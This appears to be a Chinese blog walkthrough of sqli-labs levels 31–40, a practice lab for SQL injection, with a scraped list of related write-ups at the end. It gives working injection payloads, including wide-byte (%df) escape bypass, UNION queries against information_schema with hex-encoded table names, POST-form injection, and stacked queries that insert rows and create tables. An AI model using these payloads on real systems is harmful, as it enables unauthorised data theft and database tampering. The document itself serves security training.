2. 程式人生 > >sqli-labs通關教程----31~40關

sqli-labs通關教程----31~40關

阿新 發佈:2020-04-21

第三十一關

這關一樣,閉合變成(",簡單測試,#號不能用

?id=1") and ("1")=("1")--+

第三十二關

這關會把我們的輸入裡的單引號前面都加一個\使得單引號轉義,使它沒有任何意義只是一個字元,所以應該是寬位元組注入。什麼是寬位元組?

  • 當某字元的大小為一個位元組時,稱其字元為窄位元組.
  • 當某字元的大小為兩個位元組時,稱其字元為寬位元組.
  • 所有英文預設佔一個位元組,漢字佔兩個位元組
  • 常見的寬位元組編碼:GB2312,GBK,GB18030,BIG5,Shift_JIS等等
    這裡有兩個思路,第一個我們自己再新增一個斜槓\把系統新增的\轉義,但是這裡會在我們新增的\前面還會再新增兩個個\把我們的\和'一起給轉義了.........

    還有個思路就是寬位元組注入,
    當使用寬位元組編碼,如:GBK時,兩個連在一起的字元會被認為是漢字,我們可以在單引號前加一個字元,使其和斜槓(\)組合被認為成漢字,從未達到讓斜槓消失的目的,進而使單引號發揮作用
    注意:前一個字元的Ascii要大於128,兩個字元才能組合成漢字
    就比如在單引號前面輸入一個%df這樣進入系統就變成%df%5c%27,但是因為mysql使用的寬位元組編碼會把%df%5c當做一個漢字,所以就把\給註釋掉了
    爆庫名
?id=-1%df' union select 1,2,database() --+


看到\和%df已經組合成功了
爆列名:

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

這裡將users進行hex編碼可繞過'單引號

之後操作一樣

第三十三關

這關和32關一樣啊,payload一模一樣都能用,看了下原始碼連這關的標題都寫的32...

第三十四關

這關就是就是變成POST請求,order by只能猜到2列資料
爆列名:

uname=admin1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&passwd=admin1&submit=Submit&

第三十五關

這關還是有轉義,但變成數字型注入了,不用引號了。直接注入就行。但是指定表名和資料庫名查詢還是要hex編碼。
爆列名:

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

第三十六關

這關就是瀏覽器輸入的值經過mysql_real_escape_string() 函式轉義 SQL 語句中使用的字串中的特殊字元。
下列字元受影響:

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a
    就是被轉義的關鍵字比較多,其實還是闊以用之前32關的寬字元注入來做,一樣的payload
    爆列名:
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

第三十七關

這關和34關類似,一樣的payload,用post方法提交
爆列名:

uname=admin1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&passwd=admin1&submit=Submit&

第三十八關

這關看標題是堆疊注入,就是把很多條sql語句堆在一起使用,用分號區分不同的sql語句。雖然限制很多但利用mysqli_multi_query()函式就支援多條sql語句同時執行。
平常sql注入受到sql語句的限制就是來查查資料,但利用堆疊注入完全可以自己構造sql語句,對資料庫進行增刪改查操作,可謂危害很大。
這關也可以用尋常的sql注入套路。
向users表插入資料

?id=1';insert into users(id,username,password) value (66,'acca','bbc') --+


新建一個以emails表為模板的表

?id=1';create table test like emails;--+

第三十九關

和上一關一樣,沒有閉合了變成數字型注入,其他一樣。
新建一個以emails表為模板的表

?id=1;create table test like emails;--+

第四十關

與前幾關一樣,閉合變成')
插入資料

?id=1') ;insert into users(id,username,password) values('17','aaa','bbb'); %23
 
 

            
  

           

              
              

            

            
相關推薦

			   
            
            
            
 

    


    
    
sqli-labs通關教程----31~40

     
 第三十一關
這關一樣,閉合變成(",簡單測試,#號不能用
?id=1") and ("1")=("1")--+

第三十二關
這關會把我們的輸入裡的單引號前面都加一個\使得單引號轉義,使它沒有任何意義只是一個字元,所以應該是寬位元組注入。什麼是寬位元 



  
 

    


    
    
sqli-labs通關----11~20

     
 第十一關
從第十一關開始,就開始用post來提交資料了,我們每關的目的都是獲取users表下password欄位的內容。
post是一種資料提交方式,它主要是指資料從客戶端提交到伺服器端,例如,我們常常使用的使用者登入模組、網站的留言板模組等,在這些功能模組中我們提交的資料都是以
我們可以用抓包軟體來修改po 



  
 

    


    
    
sqli-labs-master第一:基於錯誤的GET單引號字符型註入

     
 where   php版本   網站   value   ali   pass   看到了   php代碼   賬號   首先來到第一關:http://127.0.0.1/sqli-labs-master/Less-1/ 用語句 http://127.0.0.1/sqli-labs-master/Less-1 



  
 

    


    
    
sqli-labs-master第六

     
 log   ces   51cto   proc   href   ast   http   鏈接   -o   
文本文檔可以下載:
鏈接:https://pan.baidu.com/s/1o9c0Hyq 密碼:md9wsqli-labs-master第六關 



  
 

    


    
    
sqli-labs 1-4通關筆記

     
 
							
							
							background
Mysql 有一個系統資料庫information_schema,儲存著所有的資料庫的相關資訊,一般的,
我們利用該表可以進行一次完整的注入。以下為一般的流程。
例項
select table_name from information_s 



  
 

    


    
    
sqli-labs指南 1—10

     
 
                如果你是使用的phpstudy,請務必將sql的版本調到5.5以上,因為這樣你的資料庫內才會有information_schema資料庫,方便進行實驗測試。另外-- (這裡有一個空格,--空格)在SQL內表示註釋,但在URL中,如果在最後加上-- ,瀏覽器在傳送請求的時候會把 



  
 

    


    
    
網路安全攻防實驗室通關教程-注入

     
 
								
								            
						
                
網路安全實驗室傳送門:
地址:http://hackinglab.cn
第一題:最簡單的SQL注入
檢視網頁原始碼,獲取到提示,要登入admin

所以構造使用者名稱  admin' or 'a'=' 



  
 

    


    
    
sqli-labs第二 詳解

     
 學會了第一關,時隔多天來到了第二關,怎麼說了沒有看wp就給做出來了。
首先,我是自己先判斷了下,這個是什麼注入
?id=1'  不行
?id=1' or '1'='1--+  也不行
然後又嘗試了下
?id=1 and 1=1  頁面顯示正常
?id=1 and 1=2  頁面又錯誤回顯
然後這就是數字注入了 



  
 

    


    
    
sqli-labs第3-4 詳解

     
 通過第二關,來到第三關
我們用了前兩種方法,都報錯,然後自己也不太會別的注入,然後莫名的小知識又增加了。這居然是一個帶括號的字元型注入,
這裡我們需要閉合前面的括號。
$sql=select * from users where id=("$id");
但我們傳入的id為5')然後我們的語句就變成了
 
&n 



  
 

    


    
    
sqli-labs修煉の道 less-11

     
 正常   字段名   註入   用戶   atm   pre   .cn   bat   per   首先判斷字段數目

 

Payload語句: admin‘ order by 2—s


  
正常顯示故字段數目大於等於2
 
 
 

Payload語句: admin‘ order by 3—s

  



  
 

    


    
    
Sqli labs系列-less-1 詳細篇

     
 失敗   環境   活躍   link   攻擊   master   dbd   href   and   要說 SQL 註入學習,網上眾多的靶場,就屬 Sqli labs 這個系列挺不錯的,關卡達到60多關了,我自己也就打了不幾關,一個挺不錯的練習SQL註入的源碼。
我一開始就準備等我一些原理篇總結完了, 



  
 

    


    
    
Sqli labs系列-less-2 詳細篇

     
 clas   deb   技術分享   說了   構造   2-0   content   選擇   讓其   就今天晚上一個小插曲,瞬間感覺我被嘲諷了。
SQL手工註入這個東西,雜說了吧,如果你好久不玩的話,一時說開了,你也只能講個大概,有時候,長期不寫寫,你的構造語句還非常容易忘,要不我雜會被瞬間嘲諷了啊 



  
 

    


    
    
Cocos2d-x教程(31)-TableView的滾動欄

     
 效果圖   javascrip   data   回彈   ava   pan   忘記   mod   交流   


歡迎增加Cocos2d-x 交流群:193411763

轉載時請註明原文出處 :http://blog.csdn.net/u012945598/article/details/ 



  
 

    


    
    
sqli-labs】Less7

     
 pri   select   輸出   labs   導出文件   secure   文件的   pst   ble   Less-7: 輸出文件
sql導出文件語句

select * from table_test into outfile ‘test.txt‘

既然名字是輸出文件,那肯定是和文件有關系 



  
 

    


    
    
SQLi-LABS Page-3(Basic Challenges)

     
 htm   from   lean   bool   pan   --   info   blog   lec   
 
sqlmap:
python sqlmap.py -u "http://mysqli/Less-3/?id=1"

 
---Parameter: id (GET)    Type: bo 



  
 

    


    
    
sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)

     
 format   ima   gpo   ase   rom   pos   mit   參數   png   與less1相同,直接走流程
提交參數,直接order by


http://localhost/sqli/Less-2/?id=1 order by 1%23


http://localhos 



  
 

    


    
    
sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基於時間的雙引號盲註)

     
 localhost   mage   http   labs   substr   blog   com   刷新   單引號   這個和less9一樣,單引號改完雙引號就行了

http://localhost/sqli/Less-10/?id=1" and sleep(5)%23

5s後頁面完成刷新

 



  
 

    


    
    
sqli-labs】 less9 GET - Blind - Time based. -  Single Quotes  (基於時間的GET單引號盲註)

     
 mage   一個   sub   inf   .com   info   pre   log   ()   
加and

http://localhost/sqli/Less-9/?id=1‘ and ‘1‘=‘1%23
http://localhost/sqli/Less-9/?id=1‘ and ‘1‘ 



  
 

    


    
    
sqli-labs】 less11 POST - Error Based - Single quotes- String (基於錯誤的POST單引號字符型註入)

     
 min   blog   查看   字符   str   rom   輸入   single   優先級   
查看源碼,用戶名和密碼通過post提交

加單引號提交
 
出現報錯,推測對應的SQL語句

select ... from ... where xxx=‘‘‘ and yyy=‘123‘ limi 



  
 

    


    
    
sqli-labs】 less13 POST - Double Injection - Single quotes- String -twist (POST型單引號變形雙註入)

     
 顯示   div   sql   用戶   inject   quotes   .com   sqli   報錯   
報錯

閉合掉括號

這關登錄成功之後不顯示登錄的用戶名密碼了


 【sqli-labs】 less13 POST - Double Injection - Single quotes-